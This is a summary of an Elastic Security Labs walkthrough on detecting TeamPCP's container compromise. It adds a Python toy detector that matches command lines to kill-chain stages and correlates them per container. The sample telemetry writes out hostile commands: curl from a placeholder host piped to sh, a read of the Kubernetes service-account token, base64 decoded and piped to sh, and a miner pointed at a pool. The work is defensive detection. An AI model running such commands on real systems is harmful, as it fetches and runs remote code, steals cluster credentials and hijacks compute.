Published on 20 March 2026, this Elastic Security Labs piece provides a real‑world walkthrough of TeamPCP’s multi‑stage container compromise, demonstrated through D4C runtime telemetry across execution, persistence, lateral movement, and monetization phases. The scenario, based on Flare’s documentation, follows how TeamPCP operates inside a containerised environment and maps behaviours to MITRE ATT&CK, illustrating how detection logic recognises each stage as part of a coherent attack chain.
It covers Stage 1’s download-and-pipe‑to‑shell, Kubernetes environment discovery, and Stage 3’s lateral movement via kube[.]py, continuing through persistence via Systemd, runtime tool installation, tunnelling and proxy access, encoded payload execution, miner deployment, and finally node‑level escalation and control.
The article emphasises D4C’s ability to surface runtime signals inside containers while noting that certain steps, such as privileged workload creation or control‑plane manipulation, require Kubernetes audit logs for full visibility. Attack Discovery is highlighted as correlating 130+ signals into a single, narrative summary of the full kill chain.
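To make concrete what "recognising each stage as part of a coherent attack chain" means in practice, here is an added toy example; it is not code from the Elastic article, from D4C or from Attack Discovery. It runs a handful of stage rules over constructed container process events (the container ids, command lines and timestamps are made up) and then correlates the resulting signals per container into an ordered chain, so that a lone `kubectl get` in an ops container does not trigger while the pipe‑to‑shell, discovery, decode‑and‑execute, Systemd persistence and miner launch in one container do. The ATT&CK technique ids are my own mapping of each rule, not the article's, and the `stratum+tcp://` pool marker is simply one well‑known miner indicator chosen for the example.

```python
import re
from dataclasses import dataclass

# Kill-chain stages this toy recognises, in the order the article narrates them.
STAGE_ORDER = ["initial_execution", "discovery", "decode_execute", "persistence", "monetization"]


@dataclass(frozen=True)
class Event:
    ts: int            # seconds since some epoch; constructed, not real telemetry
    container_id: str  # runtime container id (constructed)
    cmdline: str       # full command line of the spawned process


@dataclass(frozen=True)
class Signal:
    ts: int
    container_id: str
    stage: str
    technique: str     # ATT&CK technique id; my mapping, not the article's
    cmdline: str


# (stage, ATT&CK id, pattern over the command line). Each rule describes one
# behaviour the article attributes to the intrusion; the regexes are my own.
RULES = [
    ("initial_execution", "T1059.004", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),       # download piped to shell
    ("discovery", "T1613", re.compile(r"\bkubectl\b.*\b(get|describe)\b|/var/run/secrets/kubernetes\.io")),
    ("decode_execute", "T1140", re.compile(r"\bbase64\b.*(-d|--decode).*\|\s*(ba)?sh\b")),    # encoded payload -> shell
    ("persistence", "T1543.002", re.compile(r"\bsystemctl\b.*\benable\b|/etc/systemd/system/.*\.service")),
    ("monetization", "T1496", re.compile(r"stratum\+tcp://")),                                   # miner pool URL scheme
]


def detect(events):
    """Emit one Signal per (event, matching rule). A single event may hit several rules."""
    signals = []
    for ev in events:
        for stage, technique, pattern in RULES:
            if pattern.search(ev.cmdline):
                signals.append(Signal(ev.ts, ev.container_id, stage, technique, ev.cmdline))
    return signals


@dataclass
class Chain:
    container_id: str
    stages: list       # distinct stages in order of first occurrence
    techniques: list   # ATT&CK id per stage
    first_ts: int
    last_ts: int


def correlate(signals, window=3600, min_stages=3):
    """Group signals by container and keep only sequences that look like a chain:
    they start with initial execution, span at least `min_stages` distinct stages,
    and fit inside `window` seconds. Isolated signals are dropped as noise."""
    by_container = {}
    for s in sorted(signals, key=lambda s: s.ts):
        by_container.setdefault(s.container_id, []).append(s)
    chains = {}
    for cid, sigs in by_container.items():
        stages, techniques = [], []
        for s in sigs:
            if s.stage not in stages:
                stages.append(s.stage)
                techniques.append(s.technique)
        in_window = sigs[-1].ts - sigs[0].ts <= window
        if "initial_execution" in stages and len(stages) >= min_stages and in_window:
            chains[cid] = Chain(cid, stages, techniques, sigs[0].ts, sigs[-1].ts)
    return chains


def summarize(chain):
    """Render one chain as a single narrative line, the way an analyst would read it."""
    steps = " -> ".join(f"{st} ({tq})" for st, tq in zip(chain.stages, chain.techniques))
    span = chain.last_ts - chain.first_ts
    return f"container {chain.container_id}: {len(chain.stages)}-stage chain over {span}s: {steps}"


# Constructed sample telemetry: one compromised container and one benign ops container.
EVENTS = [
    Event(100, "c-web-1", "bash -c 'curl -fsSL http://payload.example.invalid/s.sh | sh'"),
    Event(160, "c-web-1", "kubectl get pods --all-namespaces"),
    Event(200, "c-web-1", "cat /var/run/secrets/kubernetes.io/serviceaccount/token"),
    Event(260, "c-web-1", "echo ZWNobyBoaQ== | base64 -d | sh"),
    Event(300, "c-web-1", "systemctl enable --now app-helper.service"),
    Event(420, "c-web-1", "miner -o stratum+tcp://pool.example.invalid:3333"),
    Event(500, "c-ops-2", "kubectl get nodes"),   # legitimate operator activity
]

if __name__ == "__main__":
    for chain in correlate(detect(EVENTS)).values():
        print(summarize(chain))
```

The correlation step is what turns seven individual hits into one finding: `c-ops-2` produces a single discovery signal and is never reported, while `c-web-1` collapses to a five‑stage narrative. Note that, as the article itself points out, the stages this toy cannot see are exactly the ones that leave no process trace inside the container, such as creating a privileged workload or manipulating the control plane; those need Kubernetes audit logs as an additional signal source rather than more exec‑telemetry rules.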